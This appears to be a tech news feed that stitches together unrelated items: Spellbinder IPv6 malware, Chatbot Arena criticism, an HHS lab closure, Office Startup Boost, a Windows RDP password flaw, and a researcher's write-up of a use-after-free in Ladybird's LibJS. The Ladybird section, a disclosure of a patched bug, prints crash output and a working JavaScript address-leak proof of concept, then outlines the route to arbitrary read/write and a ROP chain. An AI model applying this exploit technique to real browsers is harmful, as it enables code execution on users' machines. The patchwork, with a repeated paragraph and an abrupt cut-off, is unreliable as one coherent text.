SLAAC is a feature of the IPv6 networking protocol that allows devices to automatically configure their own IP addresses and default gateway without needing a DHCP server. Instead, it utilizes Router Advertisement (RA) messages to receive IP addresses from IPv6-supported routers.
The hacker's Spellbinder tool abuses this feature by sending spoofed RA messages over the network, causing nearby systems to automatically receive a new IPv6 IP address, new DNS servers, and a new, preferred IPv6 gateway.
This default gateway, though, is the IP address of the Spellbinder tool, which allows it to intercept communications and reroute traffic through attacker-controlled servers.
"Spellbinder sends a multicast RA packet every 200 ms to ff02::1 ("all nodes"); Windows machines in the network with IPv6 enabled will autoconfigure via
stateless address autoconfiguration
(SLAAC) using information provided in the RA message, and begin sending IPv6 traffic to the machine running Spellbinder, where packets will be intercepted, analyzed, and replied to where applicable," explains ESET.
Abusing IPv6 SLAAC using the Spellbinder tool
Source: ESET
ESET said attacks deploy Spellbinder using an archive named AVGApplicationFrameHostS.zip, which extracts into a directory mimicking legitimate software: "%PROGRAMFILES%\AVG Technologies."
Within this directory are AVGApplicationFrameHost.exe, wsc.dll, log.dat, and a legitimate copy of winpcap.exe. The WinPcap executable is used to side-load the malicious wsc.dll, which loads Spellbinder into memory.
Once a device is infected, Spellbinder begins capturing and analyzing network traffic attempting to connect specific domains, such as those related to Chinese software update servers.
ESET says the malware monitors for domains belonging to the following companies: Tencent, Baidu, Xunlei, Youku, iQIYI, Kingsoft, Mango TV, Funshion, Yuodao, Xiaomi, Xiaomi Miui, PPLive, Meitu, Quihoo 360, and Baofeng.
The tool then redirects those requests to download and install malicious updates that deploy a backdoor named "WizardNet."
The WizardNet backdoor gives attackers persistent access to the infected device and allows them to install additional malware as needed.
To protect against these types of attacks, organizations can monitor IPv6 traffic or turn off the protocol if it is not required in their environment.
You also mentioned the whole Chatbot Arena thing, which I think is interesting and points to the challenge around how you do benchmarking. How do you know what models are good for which things?
One of the things we've generally tried to do over the last year is anchor more of our models in our Meta ...
You also mentioned the whole Chatbot Arena thing, which I think is interesting and points to the challenge around how you do benchmarking. How do you know what models are good for which things?
One of the things we've generally tried to do over the last year is anchor more of our models in our Meta AI product north star use cases. The issue with open source benchmarks, and any given thing like the LM Arena stuff, is that they’re often skewed toward a very specific set of uses cases, which are often not actually what any normal person does in your product. [...]
So we're trying to anchor our north star on the product value that people report to us, what they say that they want, and what their revealed preferences are, and using the experiences that we have. Sometimes these benchmarks just don't quite line up. I think a lot of them are quite easily gameable.
On the Arena you'll see stuff like
Sonnet 3.7
, which is a great model, and it's not near the top. It was relatively easy for our team to tune a version of Llama 4 Maverick that could be way at the top. But the version we released, the pure model, actually has no tuning for that at all, so it's further down. So you just need to be careful with some of these benchmarks. We're going to index primarily on the products.
Reader subscriptions are a necessary way
to fund the continued existence of LWN and the quality of its content.
If you are already an LWN.net subscriber, please log in
with the form below to read this content.
Please consider
subscribing to LWN
. An LWN
subscription provides numerous benefits, including access to restricted
content and the warm feeling of knowing that you are helping to keep LWN
alive.
(Alternatively, this item will become freely
available on May 8, 2025)
RFK Jr.'S HHS Orders Lab Studying Deadly Infectious Diseases to Stop Research
According to an email viewed by WIRED, the Integrated Research Facility in Frederick, Maryland, was told to stop all experimental work by April 29 at 5 pm. The facility is part of the National Institute of Allergy and Infectious Diseases (NIAID) and is located at the US Army base Fort Detrick. It conducts research on the treatment and prevention of infectious diseases that are deemed “high consequence”—those that pose significant risks to public health. It has 168 employees, including federal workers and contractors.
The email, sent by Michael Holbrook, associate director for high containment at the Integrated Research Facility, says the lab is terminating studies on Lassa fever, SARS-Cov-2, and Eastern equine encephalitis, or EEE, a rare but lethal mosquito-borne disease that has been reported in several northern US states. “We are collecting as many samples as is reasonable to ensure these studies are of value,” he says in the email. “We have not been asked to euthanize any animals so these animals will continue to be managed.” Holbrook did not respond to an inquiry from WIRED.
The email says representatives from the Department of Homeland Security were padlocking freezers in biosafety-level-4 labs, those with the highest level of biosafety containment used for studying highly dangerous microbes. Only about a dozen BSL-4 labs exist in North America. These labs work with the viruses that cause Ebola, Lassa fever, and Marburg, types of hemorrhagic fevers. The Integrated Research Facility is one of only a few places in the world that is able to perform medical imaging on animals infected with BSL-4 agents.
“The sacrifice to research is immense,” says Gigi Kwik Gronvall, a senior scholar at the Johns Hopkins Center for Health Security, on the closure. “If things are unused for a period of time, it will cost more money to get them ready to be used again.”
The facility’s director, Connie Schmaljohn, has also been placed on administrative leave, according to the email. Previously, Schmaljohn served as a senior research scientist at the US Army Medical Research Institute of Infectious Diseases. She has more than 200 research publications, and her work has led to several clinical trials of first-of-their-kind vaccines. Schmaljohn also did not respond to an inquiry from WIRED.
In an emailed statement provided to WIRED, Bradley Moss, communication director for the office of research services at NIH, confirmed the halt in research activity. “NIH has implemented a research pause—referred to as a safety stand-down—at the Integrated Research Facility at Fort Detrick. This decision follows identification and documentation of personnel issues involving contract staff that compromised the facility’s safety culture, prompting this research pause. During the stand-down, no research will be conducted, and access will be limited to essential personnel only, to safeguard the facility and its resources.”
Moss did not elaborate on the nature of the personnel issues and said he did not know how long the research pause would last. Staff have not received an anticipated reopening date.
The research pause is the latest disruption to federal science agencies after HHS secretary Robert F. Kennedy Jr.
announced at the end of March
that 10,000 people across the vast federal health agency would lose their jobs, including those at the National Institutes of Health, Food and Drug Administration, and Centers for Disease Control and Prevention. The mass layoffs are part of a restructuring plan being carried out by President Donald Trump’s so-called
Department of Government Efficiency
.
Julia Parsons, U.S. Navy Code Breaker During World War II, Dies at 104
You know how every annoying Windows program wants to launch as soon as you boot up your computer? Well, now Office is going to do that, too. A new “Startup Boost” function will set Office to load when Windows starts up, which will make apps like Word and Excel launch faster—while making the rest of your computer slower. Whoopie.
I’m being flippant, but it’s understandable that Microsoft would want to give Office a performance boost, even if it is somewhat illusory. And in the company’s defense, the announcement in the
Microsoft 365 Message Center Archive
(spotted by
The Verge
) does say that the new tool will only be enabled on PCs that have at least 8GB of RAM and 5GB of free disk space. I think even trying to run Windows 11 on just 8GB of RAM is
kind of optimistic these days
, but at least there’s a floor.
A cynic might wonder why Microsoft is making Office start when the computer boots instead of, you know, just making Office more efficient so it can run faster. (There’s no second part to that statement. The cynic is me. I want Office to be more efficient.)
The update to the Microsoft 365 installer will initially only apply to Microsoft Word when it rolls out in mid-May, then spread to other Office programs later. And yes, you will be able to disable this feature. End users can turn it off in Word’s settings or in the Task Scheduler.
Michael is a 10-year veteran of technology journalism, covering everything from Apple to ZTE. On PCWorld he's the resident keyboard nut, always using a new one for a review and building a new mechanical board or expanding his desktop "battlestation" in his off hours. Michael's previous bylines include Android Police, Digital Trends, Wired, Lifehacker, and How-To Geek, and he's covered events like CES and Mobile World Congress live. Michael lives in Pennsylvania where he's always looking forward to his next kayaking trip.
Ladybird
is a relatively new browser engine originating from the
SerenityOS project
. Currently, it’s in pre-alpha and improving quickly.
Take a look at the website and the GitHub for more information!
I’ll be researching the JavaScript engine of Ladybird,
LibJS
.
Architecture
LibJS has an interpreter tier and no compilation tiers (yet!). It includes common modern JS engine
optimizations and is built with extensive verification checks across its critical code paths and data
structures, including vectors, making scenarios such as integer overflows leading to out-of-bounds
accesses harder to exploit.
Fuzzing
We’ll be using Fuzzilli, a popular fuzzer for JavaScript interpreters. Here’s the description from the GitHub:
A (coverage-)guided fuzzer for dynamic language interpreters based on a custom
intermediate language ("FuzzIL") which can be mutated and translated to JavaScript.
-
Fuzzilli
Fuzzilli can be configured with additional code generators that can be specialized to trigger
specific bugs. LibJS isn’t actively being OSS-fuzzed, so I didn’t add any custom generators and hoped
there would be enough shallow bugs around. There was already some persistent fuzzing code
in LibJS. After some work — like needing to compile and link Skia with RTTI (Nix 💜), fixing
some build scripts, and compiling Fuzzilli with an additional profile (again, Nix was great for this) — I
got it all working!
I ran the fuzzer for ~10 days and found 10 unique crashes. A lot of the bugs were boring:
Initially, I thought the regex bug was an integer overflow… unfortunately, it wasn’t. The real integer overflow
in
TypedArray
looked really promising — but it seems hard to exploit, with all the bounds checks protecting
vectors from bad accesses.
There were three bugs that looked really good: a heap buffer overflow, freelist corruption (or UAF) in the garbage
collector, and a heap use-after-free (UAF) in the malloc heap. But unfortunately, only the last UAF was reproducible outside of Fuzzilli.
I'm still not sure why the others didn't reproduce.
This
is the crash report for the
heap buffer overflow, and
this
is the one for the freelist corruption,
if interested.
The Bug
A Vulnerable Function
The bug is a use-after-free (UAF) on the interpreter’s argument buffer. It’s triggered by using a
proxied function object as a constructor, together with a malicious
[[Get]]
handler.
// 10.2.2 [[Construct]] ( argumentsList, newTarget )
ThrowCompletionOr<GC::Ref<Object>> ECMAScriptFunctionObject::internal_construct(
ReadonlySpan<Value> arguments_list, // [1]
FunctionObject& new_target
) {
auto& vm =this->vm();
// 1. Let callerContext be the running execution context.
// NOTE: No-op, kept by the VM in its execution context stack.
// 2. Let kind be F.[[ConstructorKind]].
auto kind = m_constructor_kind;
GC::Ptr<Object> this_argument;
// 3. If kind is base, then
if (kind == ConstructorKind::Base) {
// [2]
// a. Let thisArgument be ? OrdinaryCreateFromConstructor(newTarget, "%Object.prototype%").
this_argument = TRY(ordinary_create_from_constructor<Object>(
vm,
new_target,
&Intrinsics::object_prototype,
ConstructWithPrototypeTag::Tag
));
}
auto callee_context = ExecutionContext::create();
// [3]
// Non-standard
callee_context->arguments.ensure_capacity(max(arguments_list.size(), m_formal_parameters.size()));
callee_context->arguments.append(arguments_list.data(), arguments_list.size());
callee_context->passed_argument_count = arguments_list.size();
if (arguments_list.size() < m_formal_parameters.size()) {
for (size_t i = arguments_list.size(); i < m_formal_parameters.size(); ++i)
callee_context->arguments.append(js_undefined());
}
// [3 cont.] ...
The key parts are:
First, it takes a reference to an argument buffer,
arguments_list
. [1]
Then, it creates a new object with the same prototype as the constructor function. [2]
Then, it executes the constructor with the arguments in
arguments_list
. [3]
If the vector that
arguments_list
references is
free()
’d at any point between [1] and [3],
then
arguments_list
will dangle; and when it’s used for the function call, it leads to a use-after-free.
Let’s look at
ordinary_create_from_constructor
, called at [2]:
Creates a new JavaScript object with that prototype
It’s a simple method, but it can have side effects if the constructor happens to be a
proxy object
.
If we override the constructor function’s
[[Get]]
internal method, the call to
get_prototype_from_constructor
can execute arbitrary JavaScript code. This is useful if we can get that code to free the argument buffer.
The Argument Buffer
The interpreter stores arguments for function calls in a vector called
m_argument_values_buffer
.
It can grow, shrink, be freed, or reallocated — and we have some control over when that happens.
For example, if the current buffer holds $5$ JS values, and we run:
foo(1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
then the buffer will need to be freed and reallocated somewhere with space for 10 JS values.
Using this, we can free the interpreter’s internal argument buffer — the same one that
arguments_list
still
points to — before it’s used to set up the
callee_context
for the proceeding constructor call.
The fix is to do the prototype
[[Get]]
strictly
after
the callee context has been constructed.
Here’s
the patch.
We override
Construct
’s
[[Get]]
internal method with a function that tries to reallocate the
argument buffer. Then we invoke the constructor to trigger the bug.
➜ ladybird git:(b8fa355a21) ✗ js bug.js
===================================================================8726==ERROR: AddressSanitizer: heap-use-after-free on address 0x5020000038f0 at pc 0x7f98dd1bf19e bp 0x7ffcc8ee2ef0 sp 0x7ffcc8ee2ee8READ of size 8 at 0x5020000038f0 thread T0
#0 0x7f98dd1bf19d (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xbbf19d)#1 0x7f98dd1bdf8f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xbbdf8f)#2 0x7f98dd22a555 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc2a555)#3 0x7f98dd539cdd (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xf39cdd)#4 0x7f98dce78c0e (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x878c0e)#5 0x7f98dcdcdc0a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cdc0a)#6 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)#7 0x7f98dcdb6971 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b6971)#8 0x562b5099e2a2 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1922a2)#9 0x562b5099b114 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x18f114)#10 0x562b509c1029 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1b5029)#11 0x7f98dae2a1fd (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a1fd) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)#12 0x7f98dae2a2b8 (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a2b8) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)#13 0x562b5084ed14 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x42d14)0x5020000038f0is located 0 bytes inside of 16-byte region [0x5020000038f0,0x502000003900)
freed by thread T0 here:
#0 0x562b50940bf8 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x134bf8)#1 0x7f98dcd39e1e (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x739e1e)#2 0x7f98dcd3963d (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x73963d)#3 0x7f98dce90c12 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x890c12)#4 0x7f98dcdcd014 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cd014)#5 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)#6 0x7f98dd228b7f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc28b7f)#7 0x7f98dd225cf6 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc25cf6)#8 0x7f98dd530b92 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xf30b92)#9 0x7f98dd48e458 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xe8e458)#10 0x7f98dd09a76f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xa9a76f)#11 0x7f98dd232d4b (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc32d4b)#12 0x7f98dd22a381 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xc2a381)#13 0x7f98dd539cdd (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xf39cdd)#14 0x7f98dce78c0e (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x878c0e)#15 0x7f98dcdcdc0a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cdc0a)#16 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)#17 0x7f98dcdb6971 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b6971)#18 0x562b5099e2a2 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1922a2)#19 0x562b5099b114 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x18f114)#20 0x562b509c1029 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1b5029)#21 0x7f98dae2a1fd (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a1fd) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)previously allocated by thread T0 here:
#0 0x562b50941bc7 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x135bc7)#1 0x7f98dcd39c7f (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x739c7f)#2 0x7f98dcd3963d (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x73963d)#3 0x7f98dce90c12 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x890c12)#4 0x7f98dcdcc161 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7cc161)#5 0x7f98dcdb818a (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b818a)#6 0x7f98dcdb6971 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0x7b6971)#7 0x562b5099e2a2 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1922a2)#8 0x562b5099b114 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x18f114)#9 0x562b509c1029 (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/js+0x1b5029)#10 0x7f98dae2a1fd (/nix/store/rmy663w9p7xb202rcln4jjzmvivznmz8-glibc-2.40-66/lib/libc.so.6+0x2a1fd) (BuildId: 7b6bfe7530bfe8e5a757e1a1f880ed511d5bfaad)SUMMARY: AddressSanitizer: heap-use-after-free (/home/jess/code/ladybird-flake/ladybird/Build/old/bin/../lib64/liblagom-js.so.0+0xbbf19d)
Shadow bytes around the buggy address:
0x502000003600: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x502000003680: fa fa 0000 fa fa 00 fa fa fa 00 fa fa fa 00 fa
0x502000003700: fa fa 00 fa fa fa fd fa fa fa fd fa fa fa 00 fa
0x502000003780: fa fa 0000 fa fa 00 fa fa fa 0000 fa fa 00000x502000003800: fa fa fd fd fa fa fd fa fa fa 00 fa fa fa 00 fa
=>0x502000003880: fa fa 0000 fa fa 0000 fa fa 0000 fa fa[fd]fd
0x502000003900: fa fa 00 fa fa fa 00 fa fa fa 0000 fa fa 00 fa
0x502000003980: fa fa 00 fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000003a00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000003a80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x502000003b00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00 Partially addressable: 01020304050607 Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8726==ABORTING
Exploitation
UAF’s tend to be a nice primitive to work with. In this case, the UAF occurs in the glibc malloc heap
(since that’s where the argument buffer is allocated), rather than in a garbage-collected arena
where a lot of objects actually reside. The malloc heap mainly holds backing buffers and such,
introducing a bit of complexity when it comes to finding the right objects for a leak; although this is
somewhat mitigated by the powerful primitives available.
Leaking an Object
We can craft an
addrof
-capability by fitting a pointer somewhere inside the old
arguments_list
allocation,
then reading the
arguments
object from inside the constructor.
Here’s an example of how we can leak the address of an object:
lettarget= {};
letlinked=newFinalizationRegistry(() => {});
functionmeow() {}
lethandler= {
get() {
// [2]
// allocate more than 0x30 to free the chunk
meow(0x1, 0x2, 0x3, 0x4, 0x5, 0x6);
// [3]
// allocate the free'd chunk, with pointer to the target
linked.register(target, undefined, undefined, undefined, undefined, undefined)
}
};
functionConstruct() {
// [4]
// read the linked list node, containing the pointer
console.log(arguments)
}
letConstructProxy=new Proxy(Construct, handler);
// [1]
// allocate a 0x30 chunk
// 0x8 * 5 (js values) + 0x8 (malloc metadata) = 0x30
newConstructProxy(0x1, 0x2, 0x3, 0x4, 0x5);
The series of
undefined
arguments on $[3]$ is to make sure the
linked list node
is allocated
in our free chunk and not any prelude allocations.
FinalizationRegistry
places linked list nodes with object pointers on the malloc heap
rendering them a useful structure to leak. Running the exploit we get the double representation of
the pointer, if we repeat a few times they change slightly, subject to ASLR
We can fake a JavaScript object pointer in a similar way. We allocate a buffer into
arguments_list
,
write our fake object pointer into it, and then use the fake object inside the constructor.
There are a few additional considerations:
Our
free(arguments_list)
mechanism relies on vector reallocation, so the size of our target structures
needs to increase monotonically, and in steps large enough to trigger a reallocation.
Once we know where our fake object is, we need to tag it in accordance with Ladybird’s nan-boxing scheme,
so the engine knows its type.
Apart from that, it’s very similar; and we’ll do so in the next section.
Arbitrary Read/Write
Dynamic property lookups on objects are handled by the
get_by_value
function, shown below.
If the key is an index ([1]) and the object is an array-like ([2]) (it has an
m_indexed_properties
member),
then the property is fetched from the
m_indexed_properties
member.
inline ThrowCompletionOr<Value> get_by_value(
VM& vm,
Optional<IdentifierTableIndex> base_identifier,
Value base_value,
Value property_key_value,
Executable const& executable
) {
// [1]
// OPTIMIZATION: Fast path for simple Int32 indexes in array-like objects.
if (base_value.is_object() && property_key_value.is_int32() && property_key_value.as_i32() >=0) {
auto& object = base_value.as_object();
auto index =static_cast<u32>(property_key_value.as_i32());
autoconst* object_storage = object.indexed_properties().storage();
// [2]
// For "non-typed arrays":
if (!object.may_interfere_with_indexed_property_access()
&& object_storage) {
auto maybe_value = [&] {
// [3]
if (object_storage->is_simple_storage())
returnstatic_cast<SimpleIndexedPropertyStorage const*>(object_storage)->inline_get(index);
elsereturnstatic_cast<GenericIndexedPropertyStorage const*>(object_storage)->get(index);
}();
if (maybe_value.has_value()) {
auto value = maybe_value->value;
if (!value.is_accessor())
return value;
}
}
// try some further optimizations, otherwise fallback to a generic `internal_get`
...
Furthermore if the storage type is
SimpleIndexedPropertyStorage
then the following method is used.
This indexes into the
m_packed_elements
vector using our offset. This code path (indexing into an array-like object
that has a
SimpleIndexedPropertyStorage
) contains no virtual function calls, meaning we don’t need to give our fake
object a vtable pointer — which is useful, in that we don’t need to know where one is.
We set up our fake object such that
m_indexed_properties
points to a fake
SimpleIndexedPropertyStorage
object, whose
m_packed_elements
then points to the location of the read.
This is simpler than it sounds, as all these structures can be overlapped in the same memory region.
Now that we have the structures laid out in memory, all that’s left is ensuring:
[2] passes: by setting
m_may_interfere_with_indexed_property_access
to
false
and [3] passes: by setting
m_is_simple_storage
on the object storage to
true
After we have a reliable read capability, we can leak the vtable for
SimpleIndexedPropertyStorage
,
then patch our fake storage object. This gives us a write capability by doing the opposite process to the
read, without crashing.
Code Execution
Once we have an arbitrary read/write, we have complete control over the renderer:
We can mess with internal values in the renderer,
We can craft a fake vtable to gain control flow after a stack pivot,
We can overwrite stack return pointers and construct a ROP chain.
The most reliable method for getting code execution appears to be overwriting a return pointer.
First, we leak the location of the stack by following a chain of pointers around the address space.
The chain begins with a pointer into the LibJS mapping (the vtable pointer of our object). From there,
we leak a GOT entry taking us to libc, where we finally leak a pointer to the stack (via
__libc_argv
).
Once we’ve found the stack, we search for a specific return pointer (
__libc_start_call_main
)
and overwrite it with a ROP chain. The POC ROP chain is simple; it
execve
’s
/calc
(
syscall
0x3b
),
which is a symbolic link to the calculator app. A more complex payload would map RWX pages for a second
stage.
All that’s left is to close the tab, which will collapse the stack and trigger the ROP chain.
This
is the final exploit code for the browser, and
this
is
the exploit for the REPL. Both working on
b8fa355a21
— x86_64-linux
Below is a video of the final exploit!
Windows RDP lets you log-in using revoked passwords. Microsoft is ok with that
The ability to use a revoked password to log in through RDP occurs when a Windows machine that’s signed in with a Microsoft or Azure account is configured to enable remote desktop access. In that case, users can log in over RDP with a dedicated password that’s validated against a locally stored credential. Alternatively, users can log in using the credentials for the online account that was used to sign in to the machine.
A screenshot of an RDP configuration window showing a Microsoft account (for Hotmail) has remote access.
Even after users change their account password, however, it remains valid for RDP logins indefinitely. In some cases, Wade reported, multiple older passwords will work while newer ones won’t. The result: persistent RDP access that bypasses cloud verification, multifactor authentication, and Conditional Access policies.
Wade and another expert in Windows security said that the little-known behavior could prove costly in scenarios where a Microsoft or Azure account has been compromised, for instance when the passwords for them have been publicly leaked. In such an event, the first course of action is to change the password to prevent an adversary from using it to access sensitive resources. While the password change prevents the adversary from logging in to the Microsoft or Azure account, the old password will give an adversary access to the user’s machine through RDP indefinitely.
“This creates a silent, remote backdoor into any system where the password was ever cached,” Wade wrote in his report. “Even if the attacker never had access to that system, Windows will still trust the password.”
Will Dormann, a senior vulnerability analyst at security firm Analygence, agreed.
"It doesn't make sense from a security perspective," he wrote in an online interview. "If I'm a sysadmin, I'd expect that the moment I change the password of an account, then that account's old credentials cannot be used anywhere. But this is not the case."
Credential caching is a problem
The mechanism that makes all of this possible is credential caching on the hard drive of the local machine. The first time a user logs in using Microsoft or Azure account credentials, RDP will confirm the password's validity online. Windows then stores the credential in a cryptographically secured format on the local machine. From then on, Windows will validate any password entered during an RDP login by comparing it against the locally stored credential, with no online lookup. With that, the revoked password will still give remote access through RDP.
Understanding the recent criticism of the Chatbot Arena
Simon Willison
simonwillison.net
2025-04-30 23:55:46
The Chatbot Arena has become the go-to place for vibes-based evaluation of LLMs over the past two years. The project, originating at UC Berkeley, is home to a large community of model enthusiasts who submit prompts to two randomly selected anonymous models and pick their favorite response. This prod...
The
Chatbot Arena
has become the go-to place for
vibes-based evaluation
of LLMs over the past two years. The project, originating at UC Berkeley, is home to a large community of model enthusiasts who submit prompts to two randomly selected anonymous models and pick their favorite response. This produces an
Elo score
leaderboard of the “best” models, similar to how chess rankings work.
It’s become one of the most influential leaderboards in the LLM world, which means that billions of dollars of investment are now being evaluated based on those scores.
The Leaderboard Illusion
A new paper,
The Leaderboard Illusion
, by authors from Cohere Labs, AI2, and Princeton, Stanford, Waterloo, and Washington universities spends 68 pages dissecting and criticizing how the arena works.
Even prior to this paper there have been rumbles of dissatisfaction with the arena for a while, based on intuitions that the best models were not necessarily bubbling to the top. I’ve personally been suspicious of the fact that my preferred daily driver, Claude 3.7 Sonnet, rarely breaks the top 10 (it’s sat at 20th right now).
This all came to a head a few weeks ago when the
Llama 4 launch
was mired by a leaderboard scandal: it turned out that their model which topped the leaderboard
wasn’t the same model
that they released to the public! The arena released
a pseudo-apology
for letting that happen.
This helped bring focus to
the arena’s policy
of allowing model providers to anonymously preview their models there, in order to earn a ranking prior to their official launch date. This is popular with their community, who enjoy trying out models before anyone else, but the scale of the preview testing revealed in this new paper surprised me.
From the new paper’s abstract (highlights mine):
We find that undisclosed private testing practices benefit a handful of providers who are able to test multiple variants before public release and retract scores if desired. We establish that the ability of these providers to choose the best score leads to biased Arena scores due to selective disclosure of performance results.
At an extreme, we identify 27 private LLM variants tested by Meta in the lead-up to the Llama-4 release
.
If proprietary model vendors can submit dozens of test models, and then selectively pick the ones that score highest it is not surprising that they end up hogging the top of the charts!
This feels like a classic example of gaming a leaderboard. There are model characteristics that resonate with evaluators there that may not directly relate to the quality of the underlying model. For example, bulleted lists and answers of a very specific length tend to do better.
It is worth noting that this is quite a salty paper (highlights mine):
It is important to acknowledge that
a subset of the authors of this paper have submitted several open-weight models to Chatbot Arena
: command-r (Cohere, 2024), command-r-plus
(Cohere, 2024) in March 2024, aya-expanse (Dang et al., 2024b) in October 2024, aya-vision
(Cohere, 2025) in March 2025, command-a (Cohere et al., 2025) in March 2025. We started this extensive study driven by this submission experience with the leaderboard.
While submitting Aya Expanse (Dang et al., 2024b) for testing,
we observed that our open-weight model appeared to be notably under-sampled compared to proprietary models
— a discrepancy that is further reflected in Figures 3, 4, and 5. In response,
we contacted the Chatbot Arena organizers to inquire about these differences
in November 2024.
In the course of our discussions, we learned that some providers were testing multiple variants privately, a practice that appeared to be selectively disclosed and limited to only a few model providers
. We believe that our initial inquiries partly prompted Chatbot Arena to release
a public blog
in December 2024 detailing their benchmarking policy which committed to a consistent sampling rate across models. However, subsequent anecdotal observations of continued sampling disparities and the presence of numerous models with private aliases motivated us to undertake a more systematic analysis.
To summarize the other key complaints from the paper:
Unfair sampling rates
: a small number of proprietary vendors (most notably Google and OpenAI) have their models randomly selected in a much higher number of contests.
Transparency
concerning the scale of proprietary model testing that’s going on.
Unfair removal rates
: “We find deprecation disproportionately impacts open-weight and open-source models, creating large asymmetries in data access over”—also “out of 243 public models, 205 have been silently deprecated.” The longer a model stays in the arena the more chance it has to win competitions and bubble to the top.
The Arena responded to the paper
in a tweet
. They emphasized:
We designed our policy to prevent model providers from just reporting the highest score they received during testing. We only publish the score for the model they release publicly.
I’m dissapointed by this response, because it skips over the point from the paper that I find most interesting. If commercial vendors are able to submit dozens of models to the arena and then cherry-pick for publication just the model that gets the highest score, quietly retracting the others with their scores unpublished, that means the arena is very actively incentivizing models to game the system. It’s also obscuring a valuable signal to help the community understand how well those vendors are doing at building useful models.
Here’s
a second tweet
where they take issue with “factual errors and misleading statements” in the paper, but still fail to address that core point. I’m hoping they’ll respond to
my follow-up question
asking for clarification around the cherry-picking loophole described by the paper.
I want more transparency
The thing I most want here is transparency.
If a model sits in top place, I’d like a footnote that resolves to additional information about how that vendor tested that model. I’m particularly interested in knowing how many variants of that model the vendor tested. If they ran 21 different models over a 2 month period before selecting the “winning” model, I’d like to know that—and know what the scores were for all of those others that they didn’t ship.
This knowledge will help me personally evaluate how credible I find their score. Were they mainly gaming the benchmark or did the produce a new model family that universally scores highly even as they tweaked it to best fit the taste of the voters in the arena?
OpenRouter as an alternative?
